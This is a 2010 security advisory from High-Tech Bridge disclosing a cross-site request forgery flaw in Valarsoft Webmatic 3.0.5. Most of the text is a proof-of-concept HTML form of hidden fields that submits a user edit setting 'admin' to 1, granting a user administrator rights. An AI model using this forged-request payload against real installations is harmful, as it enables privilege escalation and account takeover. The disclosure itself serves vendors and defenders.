XSRF (CSRF) in Webmatic Aug 26 2010 12:53PM
advisory htbridge ch
Vulnerability ID: HTB22570
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_webmatic.html
Product: Webmatic
Vendor: Valarsoft ( http://www.valarsoft.com/ )
Vulnerable Version: 3.0.5 and Probably Prior Versions
Vendor Notification: 09 August 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the user editing script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/index.php" method="post" name="main" >
<input type="hidden" name="groupID" value="1" />
<input type="hidden" name="name" value="username" />
<input type="hidden" name="surname" value="user" />
<input type="hidden" name="avatar" value="bsd.png" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="zip_code" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="stateID" value="0" />
<input type="hidden" name="countryID" value="0" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="cell" value="" />
<input type="hidden" name="email" value="email (at) example (dot) com [email concealed]" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="icq" value="" />
<input type="hidden" name="birth_date" value="0000-00-00" />
<input type="hidden" name="birth_date" value="0000-00-00" />
<input type="hidden" name="birth_date" value="0000-00-00" />
<input type="hidden" name="gender" value="M" />
<input type="hidden" name="birth_city" value="" />
<input type="hidden" name="birth_stateID" value="0" />
<input type="hidden" name="birth_countryID" value="0" />
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="notes" value="" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="send" value="Save" />
<input type="hidden" name="stage" value="2" />
<input type="hidden" name="section" value="13" />
<input type="hidden" name="action" value="232" />
<input type="hidden" name="userID" value="7" />


[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus